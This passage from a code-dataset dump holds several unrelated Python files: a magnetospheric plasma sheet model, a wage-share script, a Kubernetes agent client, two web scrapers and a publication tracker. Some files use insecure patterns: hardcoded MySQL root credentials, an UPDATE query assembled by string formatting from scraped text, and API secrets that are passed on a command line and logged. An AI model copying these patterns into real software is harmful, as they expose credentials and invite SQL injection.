See description in source paper for\nmore information.\n\nReferences:\n\nTsyganenko, N. A., and T. Mukai (2003), Tail plasma sheet models derived from Geotail\nparticle data, J. Geophys. 
Res., 108, 1136, doi:10.1029/2002JA009707, A3\n\n\"\"\"\n\nimport numpy as np\n\nclass plasma_sheet(object):\n\n __aT=np.array([ 0.0000, 1.6780,-0.1606, 1.6690, 4.8200, 2.8550,-0.6020,-0.8360,\n -2.4910, 0.2568, 0.2249, 0.1887,-0.4458,-0.0331,-0.0241,-2.6890,\n 1.2220])\n __aN=np.array([ 0.0000,-0.1590, 0.6080, 0.5055, 0.0796, 0.2746, 0.0361,-0.0342,\n -0.7935, 1.1620, 0.4756, 0.7117])\n __aP=np.array([ 0.0000, 0.0570, 0.5240, 0.0908, 0.5270, 0.0780,-4.4220,-1.5330,\n -1.2170, 2.5400, 0.3200, 0.7540, 1.0480,-0.0740, 1.0150])\n\n __bnorm = 5.0\n __vnorm = 500.0\n __nnorm = 10.0\n __rnorm = 10.0\n __pnorm = 3.0\n __dtor = np.pi/180.0\n __rtod = 180.0/np.pi\n\n def __init__(self,bperp=__bnorm,theta=90.0,vx=__vnorm,n=__nnorm,p=__pnorm):\n\n self.bperp = bperp/self.__bnorm\n self.theta = theta\n self.vsw = vx/self.__vnorm\n self.nsw = n/self.__nnorm\n self.psw = p/self.__pnorm\n self.bz = self.bperp*np.cos(self.__dtor*theta)\n\n if(self.bz > 0.0):\n self.bzs = 0.0\n self.bzn = self.bz\n else:\n self.bzn = 0.0\n self.bzs = -self.bz\n\n self.fsw = self.bperp*np.sqrt(np.sin(0.5*theta*self.__dtor))\n\n return\n\n def set_parameters(self,bperp=None,theta=None,vx=None,n=None,p=None):\n\n if not bperp is None:\n self.bperp = bperp/self.__bnorm\n\n if not theta is None:\n self.theta = theta\n\n if not vx is None:\n self.vsw = vx/self.__vnorm\n\n if not n is None:\n self.nsw = n/self.__nnorm\n\n if not p is None:\n self.psw = p/self.__pnorm\n\n if (not bperp is None) or (not theta is None):\n self.bz = self.bperp*np.cos(self.__dtor*self.theta)\n if self.bz > 0.0:\n self.bzs = 0.0\n self.bzn = self.bz\n else:\n self.bzs = -self.bz\n self.bzn = 0.0\n self.fsw = self.bperp*np.sqrt(np.sin(0.5*theta*self.__dtor))\n\n return\n\n def get_pressure(self,x,y):\n rho = np.sqrt(x*x+y*y)/self.__rnorm\n rm1 = rho-1.0\n phi = np.arctan2(y,x)\n\n P = (self.__aP[1]*rho**self.__aP[6]+\n self.__aP[2]*rho**self.__aP[7]*self.psw**self.__aP[11]+\n self.__aP[3]*rho**self.__aP[8]*self.fsw**self.__aP[12]+\n np.sin(phi)**2*\n (\n self.__aP[4]*self.psw**self.__aP[13]*np.exp(-self.__aP[9]*rho)+\n self.__aP[5]*self.fsw**self.__aP[14]*np.exp(-self.__aP[1]*rho)\n )\n )\n\n return P\n\n def get_density(self,x,y):\n rho = np.sqrt(x*x+y*y)/self.__rnorm\n rm1 = rho-1.0\n phi = np.arctan2(y,x)\n\n N = (rho**self.__aN[8]*\n (\n self.__aN[1]+\n self.__aN[2]*self.nsw**self.__aN[10]+\n self.__aN[3]*self.bzn+\n self.__aN[4]*self.vsw*self.bzs\n )+\n rho**self.__aN[9]*np.sin(phi)**2*\n (\n self.__aN[5]*self.nsw**self.__aN[11]+\n self.__aN[6]*self.bzn+\n self.__aN[7]*self.vsw*self.bzs\n )\n )\n\n return N\n\n\n def get_temperature(self,x,y):\n rho = np.sqrt(x*x+y*y)/self.__rnorm\n rm1 = rho-1.0\n phi = np.arctan2(y,x)\n\n T = (self.__aT[1]*self.vsw+self.__aT[2]*self.bzn+self.__aT[3]*self.bzs+\n self.__aT[4]*np.exp(-rm1*\n (\n self.__aT[9]*self.vsw**self.__aT[15]+\n self.__aT[10]*self.bzn+\n self.__aT[11]*self.bzs\n ))+\n np.sin(phi)**2*\n (\n self.__aT[5]*self.vsw+\n self.__aT[6]*self.bzn+\n self.__aT[7]*self.bzs+\n self.__aT[8]*np.exp(-rm1*\n (\n self.__aT[12]*self.vsw**self.__aT[16]+\n self.__aT[13]*self.bzn+\n self.__aT[14]*self.bzs\n )\n ))\n )\n\n return T\n\n def calculate_moments(self,x,y):\n\n T = self.get_temperature(x,y)\n N = self.get_density(x,y)\n P = self.get_pressure(x,y)\n\n self.T = T\n self.N = N\n self.P = P\n\n self.moments = {'N':self.N,'P':self.P,'T':self.T}\n\n return self.moments\n\nif __name__ == \"__main__\":\n\n import matplotlib.pyplot as pl\n\n xwant = np.linspace(-8,-48,41)\n ywant = np.linspace(-5,5,51)\n\n pmat = 
np.zeros([xwant.size,ywant.size])\n nmat = np.zeros_like(pmat)\n tmat = np.zeros_like(pmat)\n\n tm03 = plasma_sheet()\n tm03.set_parameters(vx=600,p=8.0)\n\n for i,x in enumerate(xwant):\n for j,y in enumerate(ywant):\n res=tm03.calculate_moments(x,y)\n pmat[i,j] = res['P']\n nmat[i,j] = res['N']\n tmat[i,j] = res['T']\n\n ax1 = pl.subplot2grid((3,1),(0,0))\n ax2 = pl.subplot2grid((3,1),(1,0))\n ax3 = pl.subplot2grid((3,1),(2,0))\n\n cp1=ax1.contourf(-xwant,ywant,(pmat.T),30,cmap=pl.get_cmap('nipy_spectral'))\n pl.colorbar(cp1,ax=ax1)\n cp2=ax2.contourf(-xwant,ywant,(nmat.T),30,cmap=pl.get_cmap('nipy_spectral'))\n pl.colorbar(cp2,ax=ax2)\n cp3=ax3.contourf(-xwant,ywant,(tmat.T),30,cmap=pl.get_cmap('nipy_spectral'))\n pl.colorbar(cp3,ax=ax3)\n\n pl.tight_layout()\n\n pl.show()","sub_path":"ptm_python/plasma_sheet.py","file_name":"plasma_sheet.py","file_ext":"py","file_size_in_byte":5827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"11778500","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 19 15:11:55 2017\n\n@author: User\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport statsmodels.formula.api as smf\n\ndata = pd.read_csv('timeseries_manuf_nototals.csv')\ndata.head()\n\ncleaned_data = data[(data['GVA'] > data['COE'])]\n\nneeded_data = cleaned_data[['DATE', 'WAGESHARE', 'MANUFACTURING']]\n\nnonservice_data = needed_data[(needed_data['MANUFACTURING'] == 0)]\nservice_data = needed_data[(needed_data['MANUFACTURING'] == 1)]\n\nprint('Wage shares in non-manuf. industries, whole timeseries:')\nprint(nonservice_data.describe())\n\nprint('Wage shares in manuf. industries, whole timeseries:')\nprint(service_data.describe())\n\nyearlist = []\n\nfor y in range(1997, 2015):\n yeardata = needed_data[(needed_data['DATE'] == y)]\n nonservice_data = yeardata[(yeardata['MANUFACTURING'] == 0)]\n n_yearsharedata = nonservice_data[['WAGESHARE']]\n service_data = yeardata[(yeardata['MANUFACTURING'] == 1)]\n yearsharedata = service_data[['WAGESHARE']]\n yearlist.append((y, n_yearsharedata.describe(), yearsharedata.describe()))\n \nfor y in yearlist:\n print(y[0], \":\")\n print('Non-manuf. industries:')\n print(y[1])\n print('Manuf. 
industries:')\n print(y[2])","sub_path":"wageshare_summary_cleaned_manuf.py","file_name":"wageshare_summary_cleaned_manuf.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"423034767","text":"import logging\nimport os\n\nfrom kubernetes import client, config\n\nfrom agent.orchestrator import ContainerRuntimeClient, ORCHESTRATOR_COE\n\n\nclass KubernetesClient(ContainerRuntimeClient):\n \"\"\"\n Kubernetes client\n \"\"\"\n\n def __init__(self, host_rootfs, host_home):\n super().__init__(host_rootfs, host_home)\n self.CLIENT_NAME: str = 'Kubernetes'\n config.load_incluster_config()\n self.client = client.CoreV1Api()\n self.client_apps = client.AppsV1Api()\n self.namespace = os.getenv('MY_NAMESPACE', 'nuvlabox')\n self.job_engine_lite_image = os.getenv('NUVLABOX_JOB_ENGINE_LITE_IMAGE')\n self.host_node_ip = os.getenv('MY_HOST_NODE_IP')\n self.host_node_name = os.getenv('MY_HOST_NODE_NAME')\n self.vpn_client_component = os.getenv('NUVLABOX_VPN_COMPONENT_NAME', 'vpn-client')\n self.infra_service_endpoint_keyname = 'kubernetes-endpoint'\n self.join_token_manager_keyname = 'kubernetes-token-manager'\n self.join_token_worker_keyname = 'kubernetes-token-worker'\n self.data_gateway_name = f\"data-gateway.{self.namespace}\"\n\n def get_node_info(self):\n if self.host_node_name:\n this_node = self.client.read_node(self.host_node_name)\n try:\n return this_node\n except AttributeError:\n logging.warning(f'Cannot infer node information for node \"{self.host_node_name}\"')\n\n return None\n\n def get_host_os(self):\n node = self.get_node_info()\n if node:\n return f\"{node.status.node_info.os_image} {node.status.node_info.kernel_version}\"\n\n return None\n\n def get_join_tokens(self) -> tuple:\n # NOTE: I don't think we can get the cluster join token from the API\n # it needs to come from the cluster mgmt tool (i.e. 
k0s, k3s, kubeadm, etc.)\n return ()\n\n def list_nodes(self, optional_filter={}):\n return self.client.list_node().items\n\n def get_cluster_info(self, default_cluster_name=None):\n node_info = self.get_node_info()\n\n cluster_id = self.get_cluster_id(node_info, default_cluster_name)\n\n nodes = self.list_nodes()\n managers = []\n workers = []\n for n in nodes:\n workers.append(n.metadata.name)\n for label in n.metadata.labels:\n if 'node-role' in label and 'master' in label:\n workers.pop()\n managers.append(n.metadata.name)\n break\n\n return {\n 'cluster-id': cluster_id,\n 'cluster-orchestrator': ORCHESTRATOR_COE,\n 'cluster-managers': managers,\n 'cluster-workers': workers\n }\n\n def get_api_ip_port(self):\n all_endpoints = self.client.list_endpoints_for_all_namespaces().items\n\n ip_port = None\n if self.host_node_ip:\n return self.host_node_ip, 6443\n\n try:\n endpoint = list(filter(lambda x: x.metadata.name.lower() == 'kubernetes', all_endpoints))[0]\n except IndexError:\n logging.error('There are no \"kubernetes\" endpoints where to get the API IP and port from')\n return None, None\n\n for subset in endpoint.subsets:\n for addr in subset.addresses:\n if addr.ip:\n self.host_node_ip = addr.ip\n break\n\n for port in subset.ports:\n if f'{port.name}/{port.protocol}' == 'https/TCP':\n ip_port = port.port\n break\n\n if self.host_node_ip and ip_port:\n return self.host_node_ip, ip_port\n\n return None, None\n\n def has_pull_job_capability(self):\n if self.job_engine_lite_image:\n return True\n else:\n return False\n\n def get_node_labels(self):\n node = self.get_node_info()\n node_labels = node.metadata.labels\n\n return self.cast_dict_to_list(node_labels)\n\n def is_vpn_client_running(self):\n vpn_pod = self.client.list_pod_for_all_namespaces(label_selector=f\"component={self.vpn_client_component}\").items\n\n if len(vpn_pod) < 1:\n return False\n\n for res in vpn_pod:\n for container in res.status.container_statuses:\n if container.name == self.vpn_client_component and container.ready:\n return True\n\n return False\n\n def install_ssh_key(self, ssh_pub_key, ssh_folder):\n name = 'nuvlabox-ssh-installer'\n try:\n existing_pod = self.client.read_namespaced_pod(namespace=self.namespace, name=name)\n except client.exceptions.ApiException as e:\n if e.status != 404: # If 404, this is good, we can proceed\n raise\n else:\n if existing_pod.status.phase.lower() not in ['succeeded', 'running']:\n logging.warning(f'Found old {name} with state {existing_pod.status.phase}. Trying to relaunch it...')\n self.client.delete_namespaced_pod(namespace=self.namespace, name=name)\n else:\n logging.info(f'SSH key installer \"{name}\" has already been launched in the past. 
Skipping this step')\n return False\n\n cmd = [\"sh\", \"-c\", \"echo -e \\\"${SSH_PUB}\\\" >> %s\" % f'{ssh_folder}/authorized_keys']\n volume_name = f'{name}-volume'\n pod_body = client.V1Pod(\n kind='Pod',\n metadata=client.V1ObjectMeta(name=name),\n spec=client.V1PodSpec(\n node_name=self.host_node_name,\n volumes=[\n client.V1Volume(\n name=volume_name,\n host_path=client.V1HostPathVolumeSource(\n path=f'{self.host_home}/.ssh'\n )\n )\n ],\n restart_policy='Never',\n containers=[\n client.V1Container(\n name=name,\n image='alpine',\n env=[\n client.V1EnvVar(\n name='SSH_PUB',\n value=ssh_pub_key\n )\n ],\n volume_mounts=[\n client.V1VolumeMount(\n name=volume_name,\n mount_path=ssh_folder\n )\n ],\n command=cmd\n )\n ]\n )\n )\n\n self.client.create_namespaced_pod(namespace=self.namespace, body=pod_body)\n\n return True\n\n def is_nuvla_job_running(self, job_id, job_execution_id):\n try:\n job = self.client.read_namespaced_pod(namespace=self.namespace, name=job_execution_id)\n except client.exceptions.ApiException as e:\n if e.status == 404:\n return False\n else:\n logging.error(f'Cannot handle job {job_id}. Reason: {str(e)}')\n # assume it is running so we don't mess anything\n return True\n\n try:\n if job.status.phase.lower() == 'running':\n logging.info(f'Job {job_id} is already running in pod {job.metadata.name}, with UID {job.metadata.uid}')\n return True\n elif job.status.phase.lower() == 'pending':\n logging.warning(f'Job {job_id} was created and still pending')\n # TODO: maybe we should run a cleanup for pending jobs after X hours\n else:\n if job.status.phase.lower() == 'succeeded':\n logging.info(f'Job {job_id} has already finished successfully. Deleting the pod...')\n # then it is probably UNKNOWN or in an undesired state\n self.client.delete_namespaced_pod(namespace=self.namespace, name=job_execution_id)\n except AttributeError:\n # assume it is running so we don't mess anything\n return True\n except client.exceptions.ApiException as e:\n # this exception can only happen if we tried to delete the pod and couldn't\n # log it and don't let another job come in\n logging.error(f'Failed to handle job {job_id} due to pod management error: {str(e)}')\n return True\n\n return False\n\n def launch_job(self, job_id, job_execution_id, nuvla_endpoint,\n nuvla_endpoint_insecure=False, api_key=None, api_secret=None, docker_image=None):\n\n cmd = f'-- /app/job_executor.py --api-url https://{nuvla_endpoint} ' \\\n f'--api-key {api_key} ' \\\n f'--api-secret {api_secret} ' \\\n f'--job-id {job_id}'\n\n if nuvla_endpoint_insecure:\n cmd = f'{cmd} --api-insecure'\n\n img = docker_image if docker_image else self.job_engine_lite_image\n logging.info(f'Starting job {job_id} from {img}, with command: \"{cmd}\"')\n\n pod_body = client.V1Pod(\n kind='Pod',\n metadata=client.V1ObjectMeta(name=job_execution_id),\n spec=client.V1PodSpec(\n node_name=self.host_node_name,\n restart_policy='Never',\n containers=[\n client.V1Container(\n name=job_execution_id,\n image=img,\n command=cmd\n )\n ]\n )\n )\n\n self.client.create_namespaced_pod(namespace=self.namespace, body=pod_body)\n\n def collect_container_metrics(self):\n pods_here = self.client.list_pod_for_all_namespaces(field_selector=f'spec.nodeName={self.host_node_name}')\n pods_here_per_name = {f'{p.metadata.namespace}/{p.metadata.name}': p for p in pods_here.items}\n\n this_node_capacity = self.get_node_info().status.capacity\n node_cpu_capacity = int(this_node_capacity['cpu'])\n node_mem_capacity = 
int(this_node_capacity['memory'].rstrip('Ki'))\n\n out = []\n pod_metrics_list = client.CustomObjectsApi().list_cluster_custom_object(\"metrics.k8s.io\", \"v1beta1\", \"pods\")\n\n items = pod_metrics_list.get('items', [])\n for pod in items:\n short_identifier = f\"{pod['metadata']['namespace']}/{pod['metadata']['name']}\"\n if short_identifier not in pods_here_per_name:\n continue\n\n for container in pod.get('containers', []):\n metrics = {\n 'id': pod['metadata']['selfLink'],\n 'name': container['name']\n }\n container_cpu_usage = int(container['usage']['cpu'].rstrip('n'))\n # units come in nanocores\n metrics['cpu-percent'] = \"%.2f\" % round(container_cpu_usage*100/(node_cpu_capacity*1000000000), 2)\n\n container_mem_usage = int(container['usage']['memory'].rstrip('Ki'))\n # units come in Ki\n metrics['mem-percent'] = \"%.2f\" % round(container_mem_usage*100/node_mem_capacity, 2)\n\n for cstat in pods_here_per_name[short_identifier].status.container_statuses:\n if cstat.name == container['name']:\n for k, v in cstat.state.to_dict().items():\n if v:\n metrics['container-status'] = k\n break\n\n container['restart-count'] = int(cstat.restart_count)\n\n out.append(metrics)\n\n return out\n\n def get_installation_parameters(self, search_label):\n nuvlabox_deployments = self.client_apps.list_namespaced_deployment(namespace=self.namespace,\n label_selector=search_label).items\n\n environment = []\n for dep in nuvlabox_deployments:\n dep_containers = dep.spec.template.spec.containers\n for container in dep_containers:\n try:\n env = container.env if container.env else []\n for env_var in env:\n try:\n _ = env_var.value_from\n # this is a templated var. No need to report it\n continue\n except AttributeError:\n pass\n\n environment.append(f'{env_var.name}={env_var.value}')\n except AttributeError:\n pass\n\n unique_env = list(filter(None, set(environment)))\n\n return {'project-name': self.namespace,\n 'environment': unique_env}\n\n def read_system_issues(self, node_info):\n errors = []\n warnings = []\n # TODO: is there a way to get any system errors from the k8s API?\n # The cluster-info dump reports a lot of stuff but is all verbose\n\n return errors, warnings\n\n def get_node_id(self, node_info):\n return node_info.metadata.name\n\n def get_cluster_id(self, node_info, default_cluster_name=None):\n cluster_id = default_cluster_name\n cluster_name = node_info.metadata.cluster_name\n if cluster_name:\n cluster_id = cluster_name\n\n return cluster_id\n\n def get_cluster_managers(self):\n managers = []\n for n in self.list_nodes():\n for label in n.metadata.labels:\n if 'node-role' in label and 'master' in label:\n managers.append(n.metadata.name)\n\n return managers\n\n def get_host_architecture(self, node_info):\n return node_info.status.node_info.architecture\n\n def get_hostname(self, node_info=None):\n return self.host_node_name\n\n def get_client_version(self):\n # IMPORTANT: this is only implemented for this k8s client class\n return self.get_node_info().status.node_info.kubelet_version\n\n def get_kubelet_version(self):\n # IMPORTANT: this is only implemented for this k8s client class\n return self.get_node_info().status.node_info.kubelet_version\n\n def get_cluster_join_address(self, node_id):\n # NOT IMPLEMENTED for k8s installations\n pass\n\n def is_node_active(self, node):\n if any(list(map(lambda n: n.type == 'Ready' and n.status == 'True', node.status.conditions))):\n return node.metadata.name\n\n return None\n\n def get_container_plugins(self):\n # TODO\n # doesn't seem to be 
available from the API\n return []\n\n def define_nuvla_infra_service(self, api_endpoint: str, tls_keys: list) -> dict:\n if api_endpoint:\n infra_service = {\n \"kubernetes-endpoint\": api_endpoint\n }\n\n if tls_keys:\n infra_service[\"kubernetes-client-ca\"] = tls_keys[0]\n infra_service[\"kubernetes-client-cert\"] = tls_keys[1]\n infra_service[\"kubernetes-client-key\"] = tls_keys[2]\n\n return infra_service\n else:\n return {}\n\n def get_partial_decommission_attributes(self) -> list:\n # TODO for k8s\n return []\n\n def infer_if_additional_coe_exists(self, fallback_address: str=None) -> dict:\n # For k8s installations, we might want to see if there's also Docker running alongside\n # TODO\n return {}\n\n def get_all_nuvlabox_components(self) -> list:\n # TODO\n return []\n\n","sub_path":"code/agent/orchestrator/kubernetes.py","file_name":"kubernetes.py","file_ext":"py","file_size_in_byte":15525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"180605675","text":"# -*- coding: UTF-8 -*-\nimport os\nimport time\nimport pymysql\nimport scrapy\n\nsql_list = []\nstart_time = time.time()\n\nroot_dir = r'C:\\Users\\Administrator.DESKTOP-DV7S27B\\Desktop\\IDGdemo\\selenium\\selenium公司详情'\nlists = os.listdir(root_dir) # list all directories and files under the folder\nfor i in range(0, len(lists)):\n path = os.path.join(root_dir, lists[i])\n if os.path.isfile(path): # # check whether the path is a file\n with open(path, 'r', encoding='utf-8') as f: # to read a text file that is not UTF-8 encoded, pass the encoding parameter to the open() function\n page_source = f.read()\n page_sel = scrapy.Selector(text=page_source)\n name = page_sel.xpath('//*[@id=\"header\"]/div[2]/div[1]/span[1]//text()').extract_first()\n # these are the newly added fields\n legal_name = page_sel.xpath('//*[@id=\"gongshangInfo\"]/div[3]/div[1]/span[2]/text()').extract_first()\n legal_person = page_sel.xpath('//*[@id=\"gongshangInfo\"]/div[3]/div[2]/span[2]/text()').extract_first()\n registered_capital = page_sel.xpath(\n '//*[@id=\"gongshangInfo\"]/div[3]/div[4]/table/tbody/tr/td[3]//text()').extract()\n registered_capital = list(set(registered_capital)) # to deduplicate the repeated '-' elements\n for capital in registered_capital:\n if '-' == capital:\n registered_capital.remove(capital) # remove the element from the list by value\n print(name, registered_capital)\n registered_capital = sum([float(capital.replace('万人民币', '').strip()) for capital in registered_capital]) # strip the '万人民币' (10k RMB) unit suffix before summing\n competing_products = page_sel.xpath('//*[@class=\"jsx-2833694364 table-section\"]') # take the second one\n for product in competing_products:\n print(product.extract())\n product_source = scrapy.Selector(text=product.extract())\n # competing_product = product_source.xpath('/html/body/div/div/div[4]/span/span/span[1]/a//text()').extract_first()\n competing_product = product_source.xpath('/html/body/div/div/div[1]/div/div[2]/div[1]/a//text()').extract_first()\n if competing_product:\n competing_product_list = ''.join(competing_product)\n db = pymysql.connect(\"192.168.103.31\", \"root\", \"adminadmin\", \"company\")\n # use the cursor() method to create a cursor object\n cursor = db.cursor()\n # SQL update statement\n sql = \"UPDATE XINIU1203 SET legal_name = '%s',legal_person= '%s',registered_capital= '%s',competing_product= '%s' WHERE project_name = '%s'\" % (\n legal_name, legal_person, registered_capital, competing_product_list, name)\n print(sql)\n try:\n # execute the sql statement\n cursor.execute(sql)\n # commit to the database\n db.commit()\n except Exception as e:\n print(e)\n # roll back if an error occurs\n db.rollback()\n db.close()\nend_time = time.time()\nprint('elapsed time', end_time - 
start_time)\n","sub_path":"IDGdemo/selenium/公司详情页解析.py","file_name":"公司详情页解析.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"453297025","text":"# -*- coding: utf-8 -*-\nimport time\nfrom requests import get\nimport win32com.client as win32\nfrom selenium import webdriver\nimport datetime\nimport re\nimport os\nimport csv\n\nDATA_DIR = '../../ScrapData'\nTEMP_DIR = os.path.join(os.getcwd(), \"../temp/\")\nCSV_POST = os.path.join(DATA_DIR, 'post_gongju_3.csv')\nTEMP_TXT_FILE = \"temp_gongju.txt\"\nTEMP_HW_FILE = \"temp_gongju.hwp\"\n\ndef main():\n get_list(\"20200101\", \"20201231\") # date range of news posts to collect, e.g. (20200101, 20201231)\n\n\n\ndef get_list(srtdate, enddate):\n start_date = datetime.date(int(srtdate[:4]), int(srtdate[4:6]), int(srtdate[6:8]))\n end_date = datetime.date(int(enddate[:4]), int(enddate[4:6]), int(enddate[6:8]))\n\n # implementation of the scraping feature\n cols = ['date', 'department', 'title', 'content']\n count = 0\n\n if not os.path.exists(CSV_POST):\n with open(CSV_POST, 'w', newline='', encoding='utf-8') as f:\n w = csv.writer(f)\n w.writerow(cols)\n\n for i in range(151, 313):\n driver = webdriver.Chrome('chromedriver', options=driver_option())\n driver.implicitly_wait(time_to_wait=5) # implicit wait, in seconds\n url = \"https://www.gongju.go.kr/prog/saeolNews/sub04_02_01/list.do?pageIndex=\" + str(i)\n driver.get(url=url)\n tr = driver.find_element_by_tag_name(\"tbody\").find_elements_by_tag_name(\"tr\")\n\n for i in tr:\n td = i.find_elements_by_tag_name(\"td\")\n date = td[3].text\n text_date = datetime.datetime.strptime(date, '%Y-%m-%d').date()\n\n if text_date <= end_date:\n if text_date < start_date:\n break\n\n try:\n driver2 = webdriver.Chrome('chromedriver', options=driver_option())\n driver2.implicitly_wait(time_to_wait=10)\n\n postNum = td[1].find_element_by_tag_name(\"a\").get_attribute(\"onclick\")\n postNum = postNum.split(\"'\")[1]\n postURL = \"https://www.gongju.go.kr/prog/saeolNews/sub04_02_01/view.do?newsEpctNo=\" + postNum\n\n driver2.get(url=postURL)\n time.sleep(1)\n\n count += 1\n print(count)\n xpathTitle = \"/html/body/div[6]/div[2]/div/div[2]/div/div[1]/div[1]/h2\"\n\n department = td[2].text\n title = driver2.find_element_by_xpath(xpathTitle).text\n\n content = driver2.find_element_by_class_name(\"bbs--view--content\").text\n content = remove_whitespaces(content)\n\n print(\n \"DATE : \" + date + \"\\nDEPARTMENT : \" + department + \"\\nTITLE : \" + title + \"\\nCONTENT :\" + content)\n\n if len(content) == 0:\n content = \"empty\"\n\n with open(CSV_POST, 'a', newline='', encoding='utf-8') as f:\n row = [date, department, title, content]\n w = csv.writer(f)\n w.writerow(row)\n\n except Exception as e:\n print(e)\n print(\"The data is empty.\")\n\n driver2.close()\n\n if text_date < start_date:\n break\n driver.close()\n\n\ndef get_text_file():\n f = open(TEMP_DIR + TEMP_TXT_FILE, mode='r')\n return f.read()\n\n\ndef driver_option():\n options = webdriver.ChromeOptions()\n options.add_argument('window-size=1920,1080')\n options.add_argument('headless')\n\n return options\n\n\ndef remove_whitespaces(text):\n lines = text.split('\\n')\n lines = (l.strip() for l in lines)\n lines = (l for l in lines if len(l) > 0)\n\n return '\\n'.join(lines)\n\n\nif __name__ == '__main__':\n main()","sub_path":"Scraper/gongju/scraping_Gongju.py","file_name":"scraping_Gongju.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"450477910","text":"import atexit\nimport json\nimport os\n\nfrom librarian import singleton\nfrom librarian import Manager\nfrom librarian import File\n\nfrom . import Researcher\nfrom . import Publication\nfrom .helpers import URL2soup\nfrom .helpers import researcher2publication as r2p\n\n\n@singleton\nclass Society(object):\n\n publATTR = ('li', {'class': 'li-publication'})\n\n def __init__(self, mainAuthor, authorFile, publicationFile):\n\n # A manager for the Society\n self.m = Manager()\n self.m.info('A new scientific Society has been created.')\n\n # Content\n self.authors = []\n self.author = None\n self.authorUpdate = True\n self.knownAuthors = {}\n self.publications = []\n self.knownPublications = {}\n\n # Data Files\n self.authorFile = None\n self.publicationFile = None\n\n self._initFiles(authorFile, publicationFile)\n if self.author is None:\n self._addMainAuthor(mainAuthor)\n\n def isAuthorInSociety(self, identifier):\n return int(identifier) in self.knownAuthors.keys()\n\n def isPublicationInSociety(self, identifier):\n return int(identifier) in self.knownPublications.keys()\n\n def getAuthor(self, identifier):\n return self.authors[self.knownAuthors[identifier]]\n\n def getPublication(self, identifier):\n return self.publications[self.knownPublications[identifier]]\n\n def searchPublications(self, updateJournal):\n r = Researcher\n url = '{0}/profile/{1}/publications?sorting=newest&page={2}'\n i = 1\n while len(self.publications) < self.author['pub_num']:\n soup = URL2soup(url.format(r.baseURL, self.author['profileName'], i))\n for p in soup(self.publATTR[0], attrs=self.publATTR[1]):\n self._addPublication(p, updateJournal)\n i += 1\n\n def _addPublication(self, soup, updateJournal):\n identifier = int(soup['id'].split('_')[-1])\n if not self.isPublicationInSociety(identifier):\n self.m.info('Capturing new publication {0}.'.format(identifier))\n publication = Publication(identifier, soup)\n for i in range(len(publication.authors)):\n a = publication.authors[i]\n if isinstance(a, int):\n a = self._trainAuthor(a)['identifier']\n else:\n a = self.author['identifier']\n publication.authors[i] = r2p(a)\n publication.authors[-1]['corresponding'] = True\n self.publications.append(publication.__dict__)\n self.knownPublications[identifier] = len(self.publications) - 1\n else:\n self.m.info('Updating data of {0}'.format(identifier))\n\n publication = self.getPublication(identifier)\n # update PI and citation data\n \n\n def _initFiles(self, authorFile, publicationFile):\n self._openFile(ftype = 'authors', filename = authorFile)\n self._openFile(ftype = 'publications', filename = publicationFile)\n\n def _addMainAuthor(self, identifier):\n ma = self._trainAuthor(identifier, mainAuthor = True)\n if self.author is not None:\n if ma == self.author:\n self.authorUpdate = False\n if ma['pub_num'] != self.author['pub_num']:\n n = ma['pub_num'] - self.author['pub_num']\n self.m.info('There are {0} new publications!'.format(n))\n if ma['citations'] != self.author['citations']:\n n = ma['citations'] - self.author['citations']\n self.m.info('There are {0} new citations!'.format(n))\n if ma['impact'] != self.author['impact']:\n n = ma['impact'] - self.author['impact']\n self.m.info('The impact factor is up by {0}!'.format(n))\n self.author = ma\n\n def _trainAuthor(self, identifier, mainAuthor = False):\n if not mainAuthor and self.isAuthorInSociety(identifier):\n ostring = 'Author {0} already belongs to the Society.'.format(identifier)\n self.m.info(ostring)\n return 
self.getAuthor(identifier)\n\n self.m.info('Getting data for author {0}.'.format(identifier))\n r = Researcher(identifier, mainAuthor).__dict__\n if not mainAuthor:\n self.authors.append(r)\n self.knownAuthors[r[\"identifier\"]] = len(self.authors) - 1\n return r\n\n def _openFile(self, ftype, filename):\n if os.path.isfile(filename):\n self.m.info('A previous {0} registry is loaded'.format(ftype))\n fd = File(filename)\n if ftype == 'authors':\n self._loadAuthorRegistry(fd.readJSON())\n elif ftype == 'publications':\n self._loadPublicationRegistry(fd.readJSON())\n fd.close()\n fd.unregister()\n\n else:\n self.m.info('A new {0} registry is created'.format(ftype))\n if ftype == 'authors':\n self.authorFile = filename\n atexit.register(self._writeAuthorsFile)\n elif ftype == 'publications':\n self.publicationFile = filename\n atexit.register(self._writePublicationsFile)\n\n def _loadAuthorRegistry(self, jsonArray):\n self.authors = jsonArray\n self.author = self.authors.pop(0)\n for i in range(len(self.authors)):\n self.knownAuthors[self.authors[i]['identifier']] = i\n\n def _loadPublicationRegistry(self, jsonArray):\n self.publications = jsonArray\n for i in range(len(self.publications)):\n self.knownPublications[self.publications[i]['identifier']] = i\n\n def _writeAuthorsFile(self):\n self.authors.insert(0, self.author)\n self.authorFile = File(self.authorFile, 'w')\n self.authorFile.write(json.dumps(self.authors, indent=2,\n separators=(',', ': ')))\n self.authorFile.close()\n\n def _writePublicationsFile(self):\n self.publicationFile = File(self.publicationFile, 'w')\n self.publicationFile.write(json.dumps(self.publications, indent=2,\n separators=(',', ': ')))\n self.publicationFile.close()\n","sub_path":"items/society.py","file_name":"society.py","file_ext":"py","file_size_in_byte":6264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"273717981","text":"#encoding:UTF-8\n#Jorge Daniel Juárez Ruiz\n#Use of the for loop for different functions. 
